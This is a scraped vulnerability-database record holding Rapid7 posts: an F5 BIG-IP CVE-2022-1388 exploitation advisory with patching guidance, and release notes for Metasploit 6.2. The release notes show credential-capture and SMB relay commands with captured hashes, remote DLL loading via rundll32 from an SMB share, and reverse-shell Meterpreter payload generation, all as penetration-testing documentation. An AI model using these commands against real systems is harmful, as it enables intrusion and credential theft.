\nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-13T16:52:59", "type": "rapid7blog", "title": "Metasploit Weekly Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388", "CVE-2022-20699", "CVE-2022-22965"], "modified": "2022-05-13T16:52:59", "id": "RAPID7BLOG:1C4EBCEAFC7E54954F827CAEDB3291DA", "href": "https://blog.rapid7.com/2022/05/13/metasploit-weekly-wrap-up-156/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T19:31:05", "description": "\n\nOn May 4, 2022, F5 released [an advisory](<https://support.f5.com/csp/article/K55879220>) listing several vulnerabilities, including [CVE-2022-1388](<https://support.f5.com/csp/article/K23605346>), a critical authentication bypass that leads to remote code execution in iControl REST with a CVSSv3 
base score of 9.8.\n\nThe vulnerability affects several different versions of BIG-IP prior to 17.0.0, including:\n\n * F5 BIG-IP 16.1.0 - 16.1.2 (patched in 16.1.2.2)\n * F5 BIG-IP 15.1.0 - 15.1.5 (patched in 15.1.5.1)\n * F5 BIG-IP 14.1.0 - 14.1.4 (patched in 14.1.4.6)\n * F5 BIG-IP 13.1.0 - 13.1.4 (patched in 13.1.5)\n * F5 BIG-IP 12.1.0 - 12.1.6 (no patch available, will not fix)\n * F5 BIG-IP 11.6.1 - 11.6.5 (no patch available, will not fix)\n\nOn Monday, May 9, 2022, [Horizon3](<https://www.horizon3.ai/>) released a [full proof of concept](<https://github.com/horizon3ai/CVE-2022-1388>), which we successfully executed to get a root shell. Other groups have [developed exploits](<https://www.bleepingcomputer.com/news/security/exploits-created-for-critical-f5-big-ip-flaw-install-patch-immediately/>) as well.\n\nOver the past few days, [BinaryEdge](<https://www.binaryedge.io/>) has detected an increase in [scanning and exploitation](<https://twitter.com/Balgan/status/1523683322446381059>) for F5 BIG-IP. Others on Twitter have also [observed exploitation attempts](<https://twitter.com/1ZRR4H/status/1523572874061422593>). Due to the ease of exploiting this vulnerability, the public exploit code, and the fact that it provides root access, exploitation attempts are likely to increase.\n\nWidespread exploitation is somewhat mitigated by the small number of internet-facing F5 BIG-IP devices, however; our best guess is that there are only [about 2,500 targets on the internet](<https://twitter.com/Junior_Baines/status/1522205355287228416>).\n\n## Mitigation guidance\n\nF5 customers should patch their BIG-IP devices as quickly as possible using [F5's upgrade instructions](<https://support.f5.com/csp/article/K84205182>). 
Additionally, the management port for F5 BIG-IP devices (and any similar appliance) should be tightly controlled at the network level \u2014 only authorized users should be able to reach the management interface at all.\n\nF5 also [provides a workaround as part of their advisory](<https://support.f5.com/csp/article/K23605346>). If patching and network segmentation are not possible, the workaround should prevent exploitation. We always advise patching rather than relying solely on workarounds.\n\nExploit attempts appear in at least [two different log files](<https://twitter.com/n0x08/status/1523701663290122240>):\n\n * /var/log/audit\n * /var/log/restjavad-audit.0.log\n\nBecause this vulnerability is a root compromise, successful exploitation may be very difficult to recover from. At a minimum, affected BIG-IP devices should be rebuilt from scratch, and certificates and passwords should be rotated.\n\n## Rapid7 customers\n\nInsightVM and Nexpose customers can assess their exposure to CVE-2022-1388 with an authenticated [vulnerability check](<https://www.rapid7.com/db/vulnerabilities/f5-big-ip-cve-2022-1388/>) in the May 5, 2022 content release. 
This release also includes authenticated vulnerability checks for additional CVEs in F5's [May 2022 security advisory](<https://support.f5.com/csp/article/K55879220>).\n\n_**Additional reading:**_\n\n * _[Widespread Exploitation of VMware Workspace ONE Access CVE-2022-22954](<https://www.rapid7.com/blog/post/2022/04/29/widespread-exploitation-of-vmware-workspace-one-access-cve-2022-22954/>)_\n * _[Opportunistic Exploitation of WSO2 CVE-2022-29464](<https://www.rapid7.com/blog/post/2022/04/22/opportunistic-exploitation-of-wso2-cve-2022-29464/>)_\n * _[Spring4Shell: Zero-Day Vulnerability in Spring Framework (CVE-2022-22965)](<https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/>)_\n * _[CVE-2022-0847: Arbitrary File Overwrite Vulnerability in Linux Kernel](<https://www.rapid7.com/blog/post/2022/03/09/cve-2022-0847-arbitrary-file-overwrite-vulnerability-in-linux-kernel/>)_", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-09T17:57:00", "type": "rapid7blog", "title": "Active Exploitation of F5 BIG-IP iControl REST CVE-2022-1388", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": 
"2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0847", "CVE-2022-1388", "CVE-2022-22954", "CVE-2022-22965", "CVE-2022-29464"], "modified": "2022-05-09T17:57:00", "id": "RAPID7BLOG:07CA09B4E3B3835E096AA56546C43E8E", "href": "https://blog.rapid7.com/2022/05/09/active-exploitation-of-f5-big-ip-icontrol-rest-cve-2022-1388/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-09T17:36:33", "description": "\n\nMetasploit 6.2.0 has been released, marking another milestone that includes new modules, features, improvements, and bug fixes. Since Metasploit 6.1.0 (August 2021) until the latest Metasploit 6.2.0 release we\u2019ve added:\n\n * 138 new modules\n * 148 enhancements and features\n * 156 bug fixes\n\n## Top modules\n\nEach week, the Metasploit team publishes a [Metasploit wrap-up](<https://www.rapid7.com/blog/tag/metasploit-weekly-wrapup/>) with granular release notes for new Metasploit modules. Below is a list of some recent modules that pen testers have told us they are actively using on engagements (with success).\n\n**Remote Exploitation**\n\n * [VMware vCenter Server Unauthenticated JNDI Injection RCE (via Log4Shell)](<https://github.com/rapid7/metasploit-framework/pull/16050>) by RageLtMan, Spencer McIntyre, jbaines-r7, and w3bd3vil, which exploits [CVE-2021-44228](<https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell?referrer=blog>): A vCenter-specific exploit leveraging the Log4Shell vulnerability to achieve unauthenticated RCE as `root` / `SYSTEM`. 
This exploit has been tested on both Windows and Linux targets.\n * [F5 BIG-IP iControl RCE via REST Authentication Bypass](<https://github.com/rapid7/metasploit-framework/pull/16549>) by Heyder Andrade, James Horseman, Ron Bowes, and alt3kx, which exploits [CVE-2022-1388](<https://attackerkb.com/topics/SN5WCzYO7W/cve-2022-1388?referrer=blog>): This module targets CVE-2022-1388, a vulnerability impacting F5 BIG-IP versions prior to 16.1.2.2. By making a special request, an attacker can bypass iControl REST authentication and gain access to administrative functionality. This can be used by unauthenticated attackers to execute arbitrary commands as the `root` user on affected systems.\n * [VMware Workspace ONE Access CVE-2022-22954](<https://github.com/rapid7/metasploit-framework/pull/16512>) by wvu, Udhaya Prakash, and mr_me, which exploits [CVE-2022-22954](<https://attackerkb.com/topics/BDXyTqY1ld/cve-2022-22954?referrer=blog>): This module exploits an unauthenticated remote code execution flaw in VMWare Workspace ONE Access installations; the vulnerability is being used broadly in the wild.\n * [Zyxel Firewall ZTP Unauthenticated Command Injection](<https://github.com/rapid7/metasploit-framework/pull/16563>) by jbaines-r7, which exploits [CVE-2022-30525](<https://attackerkb.com/topics/LbcysnvxO2/cve-2022-30525?referrer=blog>): This module targets CVE-2022-30525, an unauthenticated remote command injection vulnerability affecting Zyxel firewalls with zero touch provisioning (ZTP) support. Successful exploitation results in remote code execution as the `nobody` user. 
The vulnerability was [discovered](<https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/>) by Rapid7 researcher [Jake Baines](<https://github.com/jbaines-r7>).\n\n**Local Privilege Escalation**\n\n * [CVE-2022-21999 SpoolFool Privesc](<https://github.com/rapid7/metasploit-framework/pull/16344>) by Oliver Lyak and Shelby Pace, which exploits [CVE-2022-21999](<https://attackerkb.com/topics/vFYqO85asS/cve-2022-21999?referrer=blog>): A local privilege escalation targeting the spool service on Windows 10 or Server builds 18362 or earlier.\n * [Dirty Pipe Local Privilege Escalation via CVE-2022-0847](<https://github.com/rapid7/metasploit-framework/pull/16303>) by Max Kellermann and timwr, which exploits [CVE-2022-0847](<https://attackerkb.com/topics/UwW7SVPaPv/cve-2022-0847?referrer=blog>): A module targeting a privilege escalation vulnerability in the Linux kernel starting with version 5.8. The module leverages the vulnerability to overwrite a SUID binary in order to gain privileges as the `root` user.\n\n## Capture plugin\n\nCapturing credentials is a critical and early phase in the playbook of many offensive security testers. Metasploit has facilitated this for years with protocol-specific modules all under the `auxiliary/server/capture` namespace. Users can start and configure each of these modules individually, but as of MSF 6.2.0, [a new capture plugin](<https://github.com/rapid7/metasploit-framework/pull/16298>) can also streamline this process for users. The capture plugin currently starts 13 different services (17 including SSL-enabled versions) on the same listening IP address including remote interfaces via Meterpreter.\n\nAfter running the `load capture` command, the `captureg` command is available (for Capture-Global), which then offers start and stop subcommands. 
A configuration file can be used to select individual services to start.\n\nIn the following example, the plugin is loaded, and then all default services are started on the 192.168.123.128 interface:\n \n \n msf6 > load capture\n [*] Successfully loaded plugin: Credential Capture\n msf6 > captureg start --ip 192.168.123.128\n Logging results to /home/kali/.msf4/logs/captures/capture_local_20220518185845_205939.txt\n Hash results stored in /home/kali/.msf4/loot/captures/capture_local_20220518185845_846339\n [+] Authentication Capture: DRDA (DB2, Informix, Derby) started\n [+] Authentication Capture: FTP started\n [+] HTTP Client MS Credential Catcher started\n [+] HTTP Client MS Credential Catcher started\n [+] Authentication Capture: IMAP started\n [+] Authentication Capture: MSSQL started\n [+] Authentication Capture: MySQL started\n [+] Authentication Capture: POP3 started\n [+] Authentication Capture: PostgreSQL started\n [+] Printjob Capture Service started\n [+] Authentication Capture: SIP started\n [+] Authentication Capture: SMB started\n [+] Authentication Capture: SMTP started\n [+] Authentication Capture: Telnet started\n [+] Authentication Capture: VNC started\n [+] Authentication Capture: FTP started\n [+] Authentication Capture: IMAP started\n [+] Authentication Capture: POP3 started\n [+] Authentication Capture: SMTP started\n [+] NetBIOS Name Service Spoofer started\n [+] LLMNR Spoofer started\n [+] mDNS Spoofer started\n [+] Started capture jobs\n \n\nOpening a new terminal in conjunction with the `tail` command will show everything that has been captured. 
For instance, NTLMv2-SSP details through the SMB capture module:\n \n \n $ tail -f ~/.msf4/logs/captures/capture_local_20220518185845_205939.txt\n \n [+] Received SMB connection on Auth Capture Server!\n [SMB] NTLMv2-SSP Client : 192.168.123.136\n [SMB] NTLMv2-SSP Username : EXAMPLE\\Administrator\n [SMB] NTLMv2-SSP Hash : Administrator::EXAMPLE:1122334455667788:c77cd466c410eb0721e4936bebd1c35b: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\n \n\nIt is also possible to log directly to stdout without using the `tail` command:\n \n \n captureg start --ip 192.168.123.128 --stdout\n \n\n## SMB v3 server support\n\nThis work builds upon the SMB v3 client support [added in Metasploit 6.0](<https://www.rapid7.com/blog/post/2020/08/06/metasploit-6-now-under-active-development/>).\n\nMetasploit 6.2.0 contains a new standalone tool for spawning an SMB server that allows read-only access to the current working directory. This new SMB server functionality supports SMB v1/2/3, as well as encryption support for SMB v3.\n\nExample usage:\n \n \n ruby tools/smb_file_server.rb --share-name home --username metasploit --password password --share-point\n \n\nThis can be useful for copying files onto remote targets, or for running remote DLLs:\n \n \n copy \\\\192.168.123.1\\home\\example.txt .\n rundll32.exe \\\\192.168.123.1\\home\\example.dll,0\n \n\nAll remaining Metasploit modules have now been updated to support SMB v3. Some examples:\n\n * `exploit/windows/smb/smb_delivery`: This module outputs a rundll32 command that you can invoke on a remote machine to open a session, such as `rundll32.exe \\\\192.168.123.128\\tHKPx\\WeHnu,0`\n * `exploit/windows/smb/capture`: This module creates a mock SMB server that accepts credentials before returning `NT_STATUS_LOGON_FAILURE`. 
Supports SMB v1, SMB v2, and SMB v3 and captures NTLMv1 and NTLMv2 hashes, which can be used for offline password cracking\n * `exploit/windows/dcerpc/cve_2021_1675_printnightmare`: This update is an improved, all-inclusive exploit that uses the new SMB server, making it unnecessary for the user to deal with Samba.\n * `exploit/windows/smb/smb_relay`: Covered in more detail below.\n\n## Enhanced SMB relay support\n\nThe `windows/smb/smb_relay` has been updated so users can now relay over SMB versions 2 and 3. In addition, the module can now select multiple targets that Metasploit will intelligently cycle through to ensure that it is not wasting incoming connections.\n\nExample module usage:\n \n \n use windows/smb/smb_relay\n set RELAY_TARGETS 192.168.123.4 192.168.123.25\n set JOHNPWFILE ./relay_results.txt\n run\n \n\nIncoming requests have their hashes captured, as well as being relayed to additional targets to run psexec:\n \n \n msf6 exploit(windows/smb/smb_relay) > [*] New request from 192.168.123.22\n [*] Received request for \\admin\n [*] Relaying to next target smb://192.168.123.4:445\n [+] identity: \\admin - Successfully authenticated against relay target smb://192.168.123.4:445\n [SMB] NTLMv2-SSP Client : 192.168.123.4\n [SMB] NTLMv2-SSP Username : \\admin\n [SMB] NTLMv2-SSP Hash : admin:::ecedb28bc70302ee:a88c85e87f7dca568c560a49a01b0af8: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\n \n [*] Received request for \\admin\n [*] identity: \\admin - All targets relayed to\n [*] 192.168.123.4:445 - Selecting PowerShell target\n [*] Received request for \\admin\n [*] identity: \\admin - All targets relayed to\n [*] 192.168.123.4:445 - Executing the payload...\n [+] 192.168.123.4:445 - Service start timed out, OK if running a command or non-service executable...\n [*] Sending stage (175174 bytes) to 192.168.123.4\n [*] Meterpreter session 1 opened (192.168.123.1:4444 -> 192.168.123.4:52771 ) at 2022-03-02 22:24:42 +0000\n \n\nA session will be opened 
on the relay target with the associated credentials:\n \n \n msf6 exploit(windows/smb/smb_relay) > sessions\n \n Active sessions\n ===============\n \n Id Name Type Information Connection\n -- ---- ---- ----------- ----------\n 1 meterpreter x86/windows NT AUTHORITY\\SYSTEM @ DESKTOP-N3MAG5R 192.168.123.1:4444 -> 192.168.123.4:52771 (192.168.123.4)\n \n\nFurther details can be found in the [Metasploit SMB Relay documentation](<https://github.com/rapid7/metasploit-framework/blob/3b524360ed8c40ff765aa3db5de96a441387035f/documentation/modules/exploit/windows/smb/smb_relay.md>).\n\n## Improved pivoting / NATed services support\n\nMetasploit has added features to libraries that provide listening services (like HTTP, FTP, LDAP, etc) to allow them to be bound to an explicit IP address and port combination that is independent of what is typically the SRVHOST option. This is particularly useful for modules that may be used in scenarios where the target needs to connect to Metasploit through either a NAT or port-forward configuration. The use of this feature mimics the existing functionality that\u2019s provided by the reverse_tcp and reverse_http(s) payload stagers.\n\nWhen a user needs the target to connect to 10.2.3.4, the Metasploit user would set that as the SRVHOST. If, however, that IP address is the external interface of a router with a port forward, Metasploit won\u2019t be able to bind to it. To fix that, users can now set the ListenerBindAddress option to one that Metasploit can listen on \u2014 in this case, the IP address that the router will forward the incoming connection to.\n\nFor example, with the network configuration:\n\nPrivate IP: 172.31.21.26 (where Metasploit can bind to) \nExternal IP: 10.2.3.4 (where the target connects to Metasploit)\n\nThe Metasploit module commands would be:\n \n \n # Set where the target connects to Metasploit. 
ListenerBindAddress is a new option.\n set srvhost 10.2.3.4\n set ListenerBindAddress 172.31.21.26\n \n # Set where Metasploit will bind to. ReverseListenerBindAddress is an existing option.\n set lhost 10.2.3.4\n set ReverseListenerBindAddress 172.31.21.26\n \n\n## Debugging Meterpreter sessions\n\nThere are now two ways to debug Meterpreter sessions:\n\n 1. Log all networking requests and responses between msfconsole and Meterpreter, i.e. TLV packets\n 2. Generate a custom Meterpreter debug build with extra logging present\n\n**Log Meterpreter TLV packets**\n\nThis can be enabled for any Meterpreter session and does not require a special debug Metasploit build:\n \n \n msf6 > setg SessionTlvLogging true\n SessionTlvLogging => true\n \n\nHere\u2019s an example of logging the network traffic when running the `getenv` Meterpreter command:\n \n \n meterpreter > getenv USER\n \n SEND: #<Rex::Post::Meterpreter::Packet type=Request tlvs=[\n #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID meta=INT value=1052 command=stdapi_sys_config_getenv>\n #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID meta=STRING value=\"73717259684850511890564936718272\">\n #<Rex::Post::Meterpreter::Tlv type=ENV_VARIABLE meta=STRING value=\"USER\">\n ]>\n \n RECV: #<Rex::Post::Meterpreter::Packet type=Response tlvs=[\n #<Rex::Post::Meterpreter::Tlv type=UUID meta=RAW value=\"Q\\xE63_onC\\x9E\\xD71\\xDE3\\xB5Q\\xE24\">\n #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID meta=INT value=1052 command=stdapi_sys_config_getenv>\n #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID meta=STRING value=\"73717259684850511890564936718272\">\n #<Rex::Post::Meterpreter::Tlv type=RESULT meta=INT value=0>\n #<Rex::Post::Meterpreter::GroupTlv type=ENV_GROUP tlvs=[\n #<Rex::Post::Meterpreter::Tlv type=ENV_VARIABLE meta=STRING value=\"USER\">\n #<Rex::Post::Meterpreter::Tlv type=ENV_VALUE meta=STRING value=\"demo_user\">\n ]>\n ]>\n \n Environment Variables\n =====================\n \n Variable Value\n -------- -----\n USER 
demo_user\n \n\n**Meterpreter debug builds**\n\nWe have added additional options to Meterpreter payload generation for generating debug builds that will have additional log statements present. These payloads can be useful for debugging Meterpreter sessions, when developing new Meterpreter features, or for raising Metasploit issue reports etc. To choose a prebuilt Meterpreter payload with debug functionality present, set `MeterpreterDebugBuild` to true. There is also configuration support for writing the log output to stdout or to a file on the remote target by setting `MeterpreterDebugLogging` to `rpath:/tmp/meterpreter_log.txt`.\n\nFor example, within msfconsole you can generate a new payload and create a handler:\n \n \n use payload/python/meterpreter_reverse_tcp\n generate -o shell.py -f raw lhost=127.0.0.1 MeterpreterDebugBuild=true MeterpreterTryToFork=false\n to_handler\n \n\nRunning the payload will show the Meterpreter log output:\n \n \n $ python3 shell.py\n DEBUG:root:[*] running method core_negotiate_tlv_encryption\n DEBUG:root:[*] Negotiating TLV encryption\n DEBUG:root:[*] RSA key:\n DEBUG:root:[*] AES key: 0x121565e60770fccfc7422960bde14c12193baa605c4fdb5489d9bbd6b659f966\n DEBUG:root:[*] Encrypted AES key: 0x741a972aa2e95260279dc658f4b611ca2039a310ebb834dee47342a5809a68090fed0a87497f617c2b04ecf8aa1d6253cda0a513ccb53b4acc91e89b95b198dce98a0908a4edd668ff51f2fa80f4e2c6bc0b5592248a239f9a7b30b9e53a260b92a3fdf4a07fe4ae6538dfc9fa497d02010ee67bcf29b38ec5a81d62da119947a60c5b35e8b08291825024c734b98c249ad352b116618489246aebd0583831cc40e31e1d8f26c99eb57d637a1984db4dc186f8df752138f798fb2025555802bd6aa0cebe944c1b57b9e01d2d9d81f99a8195222ef2f32de8dfbc150286c122abdc78f19246e5ad65d765c23ba762fe95182587bd738d95814a023d31903c2a46\n DEBUG:root:[*] TLV encryption sorted\n DEBUG:root:[*] sending response packet\n DEBUG:root:[*] running method core_set_session_guid\n DEBUG:root:[*] sending response packet\n 
DEBUG:root:[*] running method core_enumextcmd\n DEBUG:root:[*] sending response packet\n DEBUG:root:[*] running method core_enumextcmd\n DEBUG:root:[*] sending response packet\n ... etc ...\n \n\nFor full details, see the [Debugging Meterpreter Sessions documentation](<https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html>).\n\n## User-contributable docs\n\nWe have now released user-contributable documentation for Metasploit, available at <https://docs.metasploit.com/>. This new site provides a searchable source of information for multiple topics including:\n\n * [Common Metasploit workflows](<https://docs.metasploit.com/docs/pentesting/>)\n * [Upgrading shells to Meterpreter](<https://docs.metasploit.com/docs/pentesting/metasploit-guide-upgrading-shells-to-meterpreter.html>)\n * [Kubernetes](<https://docs.metasploit.com/docs/pentesting/metasploit-guide-kubernetes.html>)\n * [MySQL](<https://docs.metasploit.com/docs/pentesting/metasploit-guide-mysql.html>)\n * [PostgreSQL](<https://docs.metasploit.com/docs/pentesting/metasploit-guide-postgresql.html>)\n * [SMB](<https://docs.metasploit.com/docs/pentesting/metasploit-guide-smb.html>)\n * [SSH](<https://docs.metasploit.com/docs/pentesting/metasploit-guide-ssh.html>)\n * [WinRM](<https://docs.metasploit.com/docs/pentesting/metasploit-guide-winrm.html>)\n * [Installation guides](<https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html>)\n * [Module development resources](<https://docs.metasploit.com/docs/development/developing-modules/guides/>)\n * ... 
and more!\n\nContributions are welcome, and the Markdown files can now be found within the Metasploit framework repo, under the [docs folder](<https://github.com/rapid7/metasploit-framework/tree/master/docs>).\n\n## Local exploit suggester improvements\n\nThe `post/multi/recon/local_exploit_suggester` post module can be used to iterate through multiple relevant Metasploit modules and automatically check for local vulnerabilities that may lead to privilege escalation.\n\nNow with Metasploit 6.2, this module has been updated with a number of bug fixes, as well as improved UX that more clearly highlights which modules are viable:\n \n \n msf6 post(multi/recon/local_exploit_suggester) > run session=-1\n ... etc ...\n [*] ::1 - Valid modules for session 3:\n ============================\n # Name Potentially Vulnerable? Check Result\n - ---- ----------------------- ------------\n 1 exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec Yes The target is vulnerable.\n 2 exploit/linux/local/cve_2022_0847_dirtypipe Yes The target appears to be vulnerable. Linux kernel version found: 5.14.0\n 3 exploit/linux/local/cve_2022_0995_watch_queue Yes The target appears to be vulnerable.\n 4 exploit/linux/local/desktop_privilege_escalation Yes The target is vulnerable.\n 5 exploit/linux/local/network_manager_vpnc_username_priv_esc Yes The service is running, but could not be validated.\n 6 exploit/linux/local/pkexec Yes The service is running, but could not be validated.\n 7 exploit/linux/local/polkit_dbus_auth_bypass Yes The service is running, but could not be validated. 
Detected polkit framework version 0.105.\n 8 exploit/linux/local/su_login Yes The target appears to be vulnerable.\n 9 exploit/android/local/futex_requeue No The check raised an exception.\n 10 exploit/linux/local/abrt_raceabrt_priv_esc No The target is not exploitable.\n 11 exploit/linux/local/abrt_sosreport_priv_esc No The target is not exploitable.\n 12 exploit/linux/local/af_packet_chocobo_root_priv_esc No The target is not exploitable. Linux kernel 5.14.0-kali4-amd64 #1 is not vulnerable\n 13 exploit/linux/local/af_packet_packet_set_ring_priv_esc No The target is not exploitable.\n 14 exploit/linux/local/apport_abrt_chroot_priv_esc No The target is not exploitable.\n 15 exploit/linux/local/asan_suid_executable_priv_esc No The check raised an exception.\n 16 exploit/linux/local/blueman_set_dhcp_handler_dbus_priv_esc No The target is not exploitable.\n \n\nSetting the option `verbose=true` will now also highlight modules that weren\u2019t considered as part of the module suggestion phase due to session platform/arch/type mismatches. 
This is useful for evaluating modules that may require manually migrating from a shell session to Meterpreter, or from a Python Meterpreter to a native Meterpreter to gain local privilege escalation.\n\n## Upcoming roadmap work\n\nIn addition to the normal module development release cycle, the Metasploit team has now begun work on adding Kerberos authentication support as part of a planned Metasploit 6.3.0 release.\n\n## Get it\n\nExisting Metasploit Framework users can update to the latest release of Metasploit Framework via the `msfupdate` command.\n\nNew users can either download the latest release through our [nightly installers](<https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html>), or if you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest release.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-06-09T16:39:00", "type": "rapid7blog", "title": "Announcing Metasploit 6.2", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 
10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2022-0847", "CVE-2022-1388", "CVE-2022-21999", "CVE-2022-22954", "CVE-2022-30525"], "modified": "2022-06-09T16:39:00", "id": "RAPID7BLOG:02EDDA927928C11A6D10A4A0D17823AF", "href": "https://blog.rapid7.com/2022/06/09/announcing-metasploit-6-2/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2022-06-13T18:00:21", "description": "A remote code execution vulnerability exists in F5 BIG-IP devices. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.1, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 9.9, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-03-22T00:00:00", "type": "checkpoint_advisories", "title": "F5 BIG-IP Remote Code Execution (CVE-2021-22986; CVE-2021-22987; CVE-2022-1388)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22986", "CVE-2021-22987", "CVE-2022-1388"], "modified": "2022-06-13T00:00:00", "id": "CPAI-2021-0198", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}